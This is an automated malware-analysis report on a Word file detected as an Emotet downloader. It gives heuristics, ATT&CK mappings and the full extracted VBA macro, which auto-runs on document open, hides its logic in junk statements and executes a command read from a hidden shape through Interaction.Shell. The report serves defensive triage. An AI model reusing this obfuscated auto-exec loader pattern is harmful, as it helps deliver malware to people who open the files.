MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros that execute a heavily obfuscated command-line instruction. This instruction uses cmd.exe to invoke PowerShell, which in turn downloads and executes a second-stage payload from a reconstructed URL. The ClamAV detection name 'Doc.Downloader.Emotet-6826426-0' strongly suggests this is an Emotet downloader variant.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6826426-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826426-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
ibjbp = CByte(24595846) CiOuntw = Array(USWMDLkdf, Interaction.Shell(FNTFPfOBu, lNifiJir), HcQbOAcLl) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5837 bytes |
SHA-256: 507c21a13e50f982ec7642912771731f8251617f9441d8493382fa5cd47841d5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
133 of 194 identifiers look randomly generated (e.g. 'OjcKzUwwVFsOw') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "oijcBSdiYswCS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
lsTiLIwqj = Atn(TiVtV)
vQvHINjGh = CLng(vbEjOc)
LGGLvR = Cos(RSJdmHPwf)
iwkLkYJM = CByte(AMUlCsrOK)
PmzwDqpE = CByte(40770098)
avzwTw = CBool(102885109)
DbiwzwQiw = GlvsFKQw
zhVuTDsW = 36255978
YSEczL = CByte(232924356)
Set nAiZtJ = Shapes("OjcKzUwwVFsOw")
On Error Resume Next
mYjRZASDF = Atn(vjEKKJ)
opWKMBWHa = CLng(WkJkjs)
BOGYQvAOS = Cos(mRiswd)
PurpZW = CByte(KzivS)
aPqMIvCaX = CByte(301066528)
vupjpva = CBool(175267935)
qVmBC = swOQNFv
lXaSjAa = 296451890
AWufjaUEH = CByte(138247538)
On Error Resume Next
KVuvMcA = Atn(jiLhzC)
vtLnn = CLng(lfSOwHFSP)
dKtwGqZ = Cos(rouwKlH)
mVHwNt = CByte(cYpchQUv)
QJhWG = CByte(28743102)
EUqvw = CBool(8980796)
VjHiVjKT = kZRZQO
FWtsfADkH = 222213965
DbXzla = CByte(231541375)
FNTFPfOBu = nAiZtJ.TextFrame.ContainingRange
On Error Resume Next
jPqmnv = Atn(sFKcc)
kQuomk = CLng(jVjosKJ)
ntRYp = Cos(kDWmE)
jzzYLDTq = CByte(OTcIwfKf)
tdlAE = CByte(77748740)
EmQAMYBhB = CBool(294761331)
WLcpqSTY = pPqXZYT
bzfunfHQC = 280866733
qSuHGwo = CByte(135436664)
On Error Resume Next
oEsMF = Atn(EiwqowdJ)
LVolKTRY = CLng(XhEBFf)
EwzGDr = Cos(jOpKpo)
QXRnI = CByte(bCbqWfio)
jDZSikB = CByte(211210708)
cUJIW = CBool(134590106)
bkEHJ = OwskCUGj
NYIfmlX = 65417500
OrOKniS = CByte(208949416)
On Error Resume Next
IcNFaRujG = Atn(rKBksjR)
ajPEYRdVo = CLng(LQsRZMn)
IomopDLE = Cos(aGRDk)
stYfDE = CByte(bEcQUqjZk)
zJbcGmrL = CByte(297635714)
ODOWaa = CBool(4448550)
YAhji = NhLYiV
dpRUuIn = 245382052
hTKlh = CByte(156101762)
On Error Resume Next
RoYLqUtnz = Atn(lTLaKSA)
bTsHIkOH = CLng(nKwiz)
VAioNwI = Cos(EvKLplphP)
PfMAKj = CByte(ziKGcwun)
qacdnjSZo = CByte(79347212)
ZYWUFvjPS = CBool(102724892)
qBAQQzn = wQXwvPE
iiMnLwjO = 159446916
qAjSiV = CByte(179635860)
On Error Resume Next
PwPwMrI = Atn(fMOARkvzD)
YXBuP = CLng(bKJPYt)
UmYOnm = Cos(NoURbFb)
hwHOu = CByte(NcUViAXC)
sTlsuNtV = CByte(51175170)
iojCkT = CBool(64067782)
bdLIJzkH = DtElB
HbwpMh = 258047263
czBPvdak = CByte(12166711)
On Error Resume Next
wbmSB = Atn(zYcHH)
naBCTJTX = CLng(YCYrqiwZ)
LEtiNjzWc = Cos(VTCRzCzR)
AklQZQXZ = CByte(bKSzwj)
DqFNVFzjk = CByte(9372891)
VlaotR = CBool(76661574)
IZnTRpH = vSRWUTUu
sEQunF = 212604781
zConmQA = CByte(260494337)
On Error Resume Next
CBXHJQnsw = Atn(CIaVk)
csLCvCJSC = CLng(wjsGjctC)
lvnzmc = Cos(wmwVOjvHv)
jKzzrFFVT = CByte(ApWZO)
FzzosZa = CByte(36545290)
WWhYN = CBool(242325685)
KrvjFPtq = iSVpIQWG
dwHGAHkrv = 137366063
XwGWPiid = CByte(208685961)
Const lNifiJir = 0
On Error Resume Next
jwOXim = Atn(npjGVjB)
hvGqSVGBL = CLng(ziDFnTlUK)
OToQmCz = Cos(tQSKw)
EFYlh = CByte(cvCclHXiB)
VAVdhO = CByte(48668747)
DPXDHvcmi = CBool(336389479)
iuznR = TQMfifPBj
RoSXqzihR = 141415833
nGzwZYj = CByte(125197667)
On Error Resume Next
GoBJwV = Atn(GDsHKini)
TdYSOZH = CLng(iSSioJ)
izTDYivK = Cos(AGXLda)
ETspDpE = CByte(jhpfdCzSu)
ZKPkJ = CByte(3566641)
SLSICvj = CBool(26442069)
NOwTktvVW = pPhKBndIE
LUJrRk = 196411211
pilGblpk = CByte(147046360)
On Error Resume Next
EvfSZSPG = Atn(WMcTpi)
CWwGoPnNX = CLng(AmmKmGHBr)
lzdXIsD = Cos(iEqJwWSh)
VwoIR = CByte(hRdUDjGVS)
ENDtZzvMD = CByte(230653358)
BqnQrE = CBool(26600166)
DDQUEvFf = zzXiYLt
PocXC = 181299663
ibjbp = CByte(24595846)
CiOuntw = Array(USWMDLkdf, Interaction.Shell(FNTFPfOBu, lNifiJir), HcQbOAcLl)
On Error Resume Next
NJNnNit = Atn(DHufuzd)
wIRbd = CLng(ThGiiHEYn)
LtESu = Cos(UIkdVbvE)
NKkOSCh = CByte(XqjjizlTi)
mUBvKM = CByte(93735777)
JrAUslBJ = CBool(138717695)
UKVFdCjcO = qIwJq
IkXRA = 153888527
ispqD = CByte(325434282)
On Error Resume Next
MROkbsB = Atn(GVDnlC)
rcXjjIb = CLng(YMziY)
JUqMESD = Cos(kCRIJ)
FpkRP = CByte(vEUNSQkPp)
bOdpzBM = CByte(181133136)
jaksVRYw = CBool(164414852)
ibiOdaEzc = oinRLaDfU
EcJkf = 132256207
MzwuRL = CByte(125685792)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.